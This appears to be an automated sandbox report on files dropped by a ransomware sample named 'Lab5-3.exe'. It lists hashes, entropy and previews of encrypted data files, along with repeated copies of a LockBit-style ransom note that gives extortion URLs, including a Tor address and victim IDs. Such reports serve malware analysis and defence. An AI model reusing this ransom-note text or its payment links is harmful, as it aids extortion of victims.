                                                                                                          Preview:....g0..h"V..Y.....wF../.U.}.H.Wk..Y.nV..V.o`3.7[.R5.<......n..Fe....U.o.o?t...p.0w1T....1m..B..b..>....-..Q..W..P.?...T.%....W.v6.....s..A...{..t.....*3..+..=.NH8...*.r:..~.........]4.>H.Gpal...7v!..CY....5...9...8..Z..(3..Tl..a.).....CHr..e...IpG......mo.t ....-P.R[..J .}..."._.?..X..[O.p....&.U..KX.y-;~.....C.;.....E.....Nc6.zz..DS..........7...n..s..Am..v.8..ceTa.'P......?[.2.._b$......C..e... ..eu.f.5hw.D........l..Y.N....hCL.V.:QN[..v.../#..rcB......b....2.>..J.,...ZVT.3.\.._......79.S..=L.q`....j..6..FQB...Q.W.oH.....I.&.u......eh...*....F.)u...aS.Ii....e..-...L.....P!....Cu...p5.f!..HeD.....Y.....s|D..& .m..o`...[`.g..3x..5".:....].......dU..F...UM.h...H.=.v.(..F.ki]v.....G.!p.%C..zq.Nk.z(......l.Z.|..t.?...<..5j.....o.......Y.;.g.%9..O...(C.v5...g.sjR.....KZXB...9...P.(.].K.K.......k.YK\..\.X.t...Z_...?Gf...}.~?Q...C.a=...]...4..7.6..e..*...H....w..y.........C..95Tk.$:^....j;?D}.rKB.....T........~...i.L.~..{a..?.s.3..p1.*%K{AEk.(.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6512
                                                                                                          Entropy (8bit):7.973041503407734
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:JiBa8+jknYLsLmFfYGF6mb7UpdSqkW8tvxDL6+LCliS3U3Z/lFkzywTkGx0uKeYO:SazjknYjFAGQM7ULS1Dd7wvuHk2wz0Cb
                                                                                                          MD5:10E1D57DC0B2EA1BB1C23F5E278D2072
                                                                                                          SHA1:2675FC82756FADB094B48C12F6E273D839111AC9
                                                                                                          SHA-256:8722CCACC86729562FF87F391CDA2A5F3BA01E2C20E3076C30093DCDAB2E61B2
                                                                                                          SHA-512:408A98E023CFC422B3F640C67F55DF333D607B3E5F338AA3A0C6DB665EAB0B1CD30C6D23011E2511B1E6BF64F9794BABD199C790197B52B166A80715B35D9859
                                                                                                          Malicious:false
                                                                                                          Preview:...yX..*..U..'..d^..pS..q..Z.5........L..8...kX.z.,.F8@...<.K@. .&.....#2.u..pq-.qSm...`..V..;.R.^..Q."...:.;.B.w..>.t...M.e`.W....}....n.)...............y..F.;y...~6...gw.....?Mx..W.....p..n.e+.G.t.k.$"X.........(@5...Y.....Q......j....A@."../..+...p..!pA.xFb..7.4.....|..r..MRd.RQ.Ny....aU\W.>`S.?f....."i.h.sf.#*.cBf..c2~......,B.1].G........N..=....c~.L..........L.o.|^...+M....2'<).^?.Q...(........d+.._..l.1.1W.@.8..5C}..AI8..CU*).......C%..*....4.........$'7.n.{.x....u.^ ..;..}U..Q..8h.....Y.&...u...R6.1.P.0k..y.n%y.H........=.....l7.W.&.5..(....a...f*.W.J((......w.......\......[.....G..%. .....V....iP.Cu.`we.`0%.....'i.f.%u..j./'./].......*..n...#:s.....=.m....$.Ez(..G_..9._.8WN...9.+=.k'......1I.9.............J...Ky......v...O..(Z.:{.....L......._.5h...>.z../....p.,K...g.,.1Nq..#......HM.o.7G.w.D..../..`.U.+....,042.:..0.ch.LN..S.c...d..f.......L.|.e...&..+....._.*..k.....]Jj.~m8...X.....Q.+..]a.&.u..y2..<......R..j...#.Q......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5824
                                                                                                          Entropy (8bit):7.967032405548761
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:oJyJ4/a9LAOHyZkCtLZ0Kfh63morNRAnR+YynGx0uKeY2ElUJ:JJZ9DGkCX0Kf+7AAX00Cb
                                                                                                          MD5:196E75C766299CE864A8ED61D3B73C22
                                                                                                          SHA1:53EC2AF21D1CF3D474607D839B3F80FC290031AD
                                                                                                          SHA-256:E4FE5616041696D027987DF0F2CFA501E6657C1BE12B2E76CF001F3D95D80C6D
                                                                                                          SHA-512:12E50E67CCEA7E08E6974A7F157C0E42E8081DD8DD8E71BE37EBB384707A2502DA9EF46194ECACD91A617208E2FBF01688B0EDDC4F2E307E188665C828410D74
                                                                                                          Malicious:false
                                                                                                          Preview:+80)...s7&,OZ7....._7?.B5w.....'<....J..y...HM.d.....#Q.....I..D8F..:..m.s..^..\..o..a.".3.P...mNJ.....K udu,+..3h... .r.0.K/.....g8...8C^..G..-#b.K....}/S......@..V...V..c..x.....v......:.aj..........t...f...- ....v.'.....&.".U..q...P.....pd.L....9...O..j..)e.;.b..95t.3S{E......%/......&.<..6W..t&w1.MVu"}.n.9.......wG!S.|.../..M....e./Z..}.tp.L<a.../@...'...]#4K..F....S..^..#Te...N.....]....)2}..I.|.T.|.K..t.vcc.h.v.M.....h..Aq.o..?.T.....x..k.\.........U".......y6sT.....+...D..;v.z93.l`D.b..>...TJ..y.....&W.rN.[.@.(V...X.............f(.7V..L_..k.|....eKQ&....=U.jG,.c..6...6.5cF..e+..~......V.D.....P.Xb.x?.D@.82.e.6...0.J_?...42Nx..0......B...{..k"+O........^n......7&.......S;.J..G.d.kY.$."..AF..R_..vs..;.=Dw.^.......)..........p..Ak.kYd_....k.&..[.T/g........2.G..-1E.-I..un.........&....\/...)...W.c3.X...t.s.)E.a.|.......".H..8s.@..Q.^.[s....... .I...K.I"r.@..i6....bx.PM.x.[.......LLiB.Z...n....f.Q...f.....X...1...7.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2448
                                                                                                          Entropy (8bit):7.928012279423597
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:LlS7KkfXXyUd8/unKnwYdODCWWpBuHfUTid3hBaUoSGFcmeykEdEElU92i:mKkvCbWHY8qBBGx0uKeY2ElUJ
                                                                                                          MD5:DFC6A71C21B7E39C728804C57AFF5D48
                                                                                                          SHA1:466F4F6C114E49EFACEC2059312B07A85547EF7C
                                                                                                          SHA-256:92A3294D5F111A1CC4AD9C6652470F3F211689BDB59F795F465188BCDDB0DF4A
                                                                                                          SHA-512:5F5F6580E9DAC10D77B42497E27EC566ACEF0157D48D27CF017CBE5C1CBD139550132725589DBC0C5A2EDDBC949177C09B83ED96DB7BB97E9F450288992FABFF
                                                                                                          Malicious:false
                                                                                                          Preview:8m.*.....}<........%....*..m.S[.F..S.,..8....yn.+..WMz....t..@ja..n.H.....yklB"..J._o.r.t;....x.g,~y.M.`e.`8.uI..o*..$..,BHQ.j.q.....4.It[...5.Ok.....Z....*mH....Du..yV..J-t...d.J"..[.\...*.3Hz.[...s...6..^IN.P...l.. ".=?.,@....H...]..K.$7..i.^MB.;.#...iL....(&#f....]...>.K.-...J..W...P.......IhZ...D&.~|....Gc'jHp;....E."<v..2..Z..m...|...."...j......=P..4.}E..g.!MI.?....c ...p.[.Ll...yU..O. J...)P]:......_..l....q.....,P.\. .GJ.. .hE..k_oi. ..2.U..F7%..\.... ...P.v.o.q...X..x.*....m.Ta!...D#.vWt.B,'9n....5..#.@...J.vD.+.....@..w.].3....Sg@c5..Q[..^#..b..&)Xf......i8...n?.e.(..........p.1.u...X./...2.zOy.x..S_.8c....?.2B......w..b..........$..{].....,^%.u."./.=.t..e].a..m...../d.f.t..w._..r...`..S6.[....9.*./08.7:.q;.R..:3..v....N.~...e....yt.Y.dv....O..!Z...xg...EMC.7.P.U...;..O}..]D\..}....X.$.W.~p^.J..............E.O@2.~j6u.5...T..A...2.$q.rA&.B.&......6....pm..Ti...ZJ......y3vn.t...q2fX.RfY"Y....I....u.}AL.R.Z.ST...EUj/.....N(.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5824
                                                                                                          Entropy (8bit):7.968579053077226
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:8Gx1o8EudkRycVjlBmdIq05p1S9XfkYiCQquqyJrRpwYm7Vi8NHtGx0uKeY2ElUJ:8C1o1udkFlBagn1of+CQ5rHwYm7Vi4WZ
                                                                                                          MD5:F6DBD4BD7E15DB810C065DCDA1D3AF76
                                                                                                          SHA1:DEA4CDA7098766CA4AC8B9B2C1E3B6BABA5250E4
                                                                                                          SHA-256:E329AE73BBCEAD5D405B682D51EA3D0A2C453DD9BC6D41B0FD084BA780CC5866
                                                                                                          SHA-512:FE0A7F28FE75F0A7B3712CEDC55CF6B8FA621C528374EFE9EA8DCB6D1F6D86E1B23C0C3A1314E05AE34AFF4FB248D7C501208A7C656F19404C41785FEEFA0D52
                                                                                                          Malicious:false
                                                                                                          Preview:.<p..\..l.....o)...S.......j$.`.;.M3DaJ....P....M.m1P[D........,W...V....,..E.y.p...r*Y..g....z...\.Q..%.R...|..|..h..L.#&fc?Lca.~.A..{...I..{j...M9.p.A..5..}........M..&.)....z.E.B.T..C.d....J..#l...|).h..0.^..c.n.:Ic....7...EMN.^z.u(%O...j.b^<..eaJr.P..Yz8j.f..K..`7....z...].6....@...y...cS...i4+,l....<..!..FV.k=..l..hqIrs.T.....*`xbq{....N%.ZA...s....>y|.'...x...o...F.{...&._......a...8....F..2.2..?o..!.4..x!.....j..j.C.1...e...d.1...j.Y.Al...R...D...8..../..J'n.*.!.... ..;<!._<...i.....#..5.>.a...g..2.+y........l..@......i....,...K.......b.Q...D.W.{y,..0a......v. zi.|.Vb|.5...m..Z.o.o?...$.D.J. )`....w..=.r7.J.o...H.b%./a...J.d..."......y...W...q..{.T#.M"ERxvOP...f...v..=[[e...........&.b>...w.&N=..n.p..b(.(^... {YJ...M...O..m.f.~.xj....Xr.*..g.._.."s.~T..@p}.V.l..V.W~.i}C...)V.`@.*.o..,Rd.l..\...vkV....k..X.t8L.t......UW....j*D.9n...`.c8.}..uI.9...a.'.C..>...,...P...;.\.?.....Mv.).....w.JD.]k.g.*./5..IW..Z..e..=......z.....:..;T....A.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6128
                                                                                                          Entropy (8bit):7.967782228124394
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:iE753L6LK5DN1qTnOicXi1Yj7YZ5KOWneSUOzAGFa59A4N7oV/Gx0uKeY2ElUJ:feq1gO5Xi0EineSUWFE5NG80Cb
                                                                                                          MD5:89E75CEE8AD04722FEEA3B9CCE9F902D
                                                                                                          SHA1:CDF2D1DF7A863C0B7A7B2CF5C2F69C1C9940BA12
                                                                                                          SHA-256:20FDE0DF0E3A9217BF7A931A6DC031497A1EF8C481508D09C4C534D098662807
                                                                                                          SHA-512:A068C7FC327288BD026D4FD4CF3BB674FA8BB2FE4F504C92D0D935866A786DF6CF4B24D07504C9CBA293E1179DE38D94062A87741C31219F710D2691E2F62346
                                                                                                          Malicious:false
                                                                                                          Preview:t.d.).I.+nq.......n^./..7q......&h...A\......m......<@..<..47..F.....|.7....}...g.A.Eb.....F..W.%.`y..Y.Z.....>'.ps..c0...L...5...o...Br.Z...2.$.;".:.Y..d......m....d...k.I...,>...[..58dw4.B...Lj..m....H`.mO....O.^o.`p..5.~...i..Qk9..s?sa...@......D........onbf../..m5..?.i7..q.\......CK..!.FZ./ H...1.RfF.........w...E..5..r..... .T\...s*...m.y(...."....P]J ..QzA...W...4..I.H.a...5._..).7x.I......S.*....*F.....K.............9...-...2.6.......2X0.hGv.....Xh.f.&U).?.H.U...h...!]<..m..A....;k.d.~#@k.rdq.T.V@.\k.+.q.....j..8.GS...r.7..<s;..xjs.G..`...X.g..V..xOkl.k.1...F .yQ .ti.....A-+Qs$.../[q .^KV .C......@?.Q6.XIW.J..H....>..wO.....-V ....v.H.. .%...r...E...........D.A.v(.;..<m$."#..H.`...{.@.&g0...c.Pl9_a..^<:..W4..'q.......7Z.<3f.>...G...W.e....YS...4.G.|-....l..L....e.>.8.n5I.....G...f#.F/.l...qd.5/|:....]x.o...A&fG./."XN]y[..2[.j..'j.._.<X./.|..KZ....-.>..-..`....f........2a.w..=.v....`..EI*._..1.2.c....r.T.......F.j.zX.w...W4.....^R..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6480
                                                                                                          Entropy (8bit):7.9663862213578795
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:Z9L/eSw/8VwSe4vS4cBoIkf5uuKHUtc8M0Cb:DeSw/rT4ft6xBtb
                                                                                                          MD5:E844D84F342F17BBEF5CC43A7178769D
                                                                                                          SHA1:A11D50A72535460620515B7BE40867E1DE46CB4E
                                                                                                          SHA-256:AB6146CBF3E807F27ECB6B87A726D78D6CE883E5F318E6D8F43FA5B9D17B4C09
                                                                                                          SHA-512:CD5B81818756101956B365183287FC9844FAA2BCB039B5F0598A2CEA05D3408E9F3E2D6EA3824C26460E3CE6417F30D79D600FDD6FD17443ADE1E11BA8BD3610
                                                                                                          Malicious:false
                                                                                                          Preview:.........;....T..'.,...&*U.4....k..)..e..Nb7@.U..K.....l.h...(H&...F.Z..l.![~....C..N.$v$ ...\.....Pv...*...l:..+a.<D;...P..IR+U..rc...(.L4..S......OZm......:..na....M./....~...6+.~.=...).{i|h....<Vr...9.5.:).f...}.3x....6;+..{{.J....<.q9W.(.C..]}e.g.<..(62.GoD..{......U.?.c.2.........0.S.$:=Z..1[;.......A.......h....i3W......QV..?..GC.G.s*g.hg.~J.r?..]..5......_.;..(.....o.o...UB7.vC.&..5?.v.pb.....z1S.r.......!w4ca..a.;R.3....V)8..,...KsF.A..[..+E...c..3.T.1.S.......p....F...5l..m....... g..VJ..B.#.....-..a......}f.".....U..Y...bCv-..MQ5\....u.}",......W.=....A......I...wZ..9..P.'......(2.;..(4.....'...= W.m.".....=.MCjC$12n..A.B....."...a8..*..Y.....&E..LU..c9...........lA=l.Q.&.....v. .....v....y.{..}.x..6...O/`...]..o.T....$......=......?w".!......!M....6Q.7.E.....{.!..H.:Y.....0.g.:wc!..(...8q..K..ePv.R.L....L"+.....O.Y;t.c(.21T...'..\.p... ...;U`..0...y...9.....gS.YHk.DO..J......P..0...F..q......".eU.`..G<..CD...cl'D.O...~.f:...eGg...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6384
                                                                                                          Entropy (8bit):7.970259456314264
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:lLePyeIdpRGoWcwtapLKRWZHMVxDyNZB1aNoRjSPvORh6Qh+0E6meGx0uKeY2Elk:5ePqGLcwtkmRWZs6NZjaNFOZo0hmN0Cb
                                                                                                          MD5:51AA7F0025561FB87790A901ADDEB0CE
                                                                                                          SHA1:21CCFAF6A47358FAFEA611927C28A69F1431D2AC
                                                                                                          SHA-256:7A8EEDDBCF453C1ADB63A0F2D94C57BA0D36CA104EA0DE75D2BB7A2711B29F43
                                                                                                          SHA-512:D2645440185C6225DC18D028512F0D684AFF0DB752A5DC1532B78AC294C6DEAF06BEE714E1DD37A6975DE0D9D68C5E5BEFDCCA3ECC08AFF5E6E936B4EA8D9106
                                                                                                          Malicious:false
                                                                                                          Preview:..It..1..C."..!...tL....[..8~S...,.t}0.H2.6I.R@O....]b..U..m7.v......].A1Zr...|+....IpO..1>...T..v.O......a3...>k..$.f'....#..5l...9}.W.."+6..j..kS|...4..N..R.1..\...f....P...T.F.k/..O.f69G.>.s.v..P...8...O.0.&.2@(..Nq..8...X....4...M..B.I.=0I...;oC+.h=..J...W.cR.......4.E...~f....Z.....X......-.K&.CO...-..k..s.l.`Y.1W1....+h...Q.ukX2j.T.^HGx...^..*.E..LC5.3<h...|E)/.....l..0.....i.......wc.?..w....fD..j...A)..K......?._....j.....^..J..../!.i...I.....].`...wTe./&..'...s.!P....Oq..j.....=(..].E^T...!.W.;..!?......o1...G1K..@...o..hk./..2d...........G,..(..X..U..7.u..>............X.......%C.9..".g.$6.E.S.....py.)..G...7..C..3ajv......N....QU...0.2.C.v..D Xh..w.....S.....h..^.|.T...q.....n.........\..}...T..8.......~..c.I...l..W.]..^.3.D..r.M.#E.D.@.Q.T.Uu.(S...@...b.f]...F.D;p.y.`..%...{..2Y..A.-..w`}-9.7s...5J9W...i.H)..|..s..`....a..in..s.. w+..A.....~`+...Q..Ao*..x...*.d&=c^....T.tm.zbd.....}02..."....Vp.W.o.. t........%& I...(.....:
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
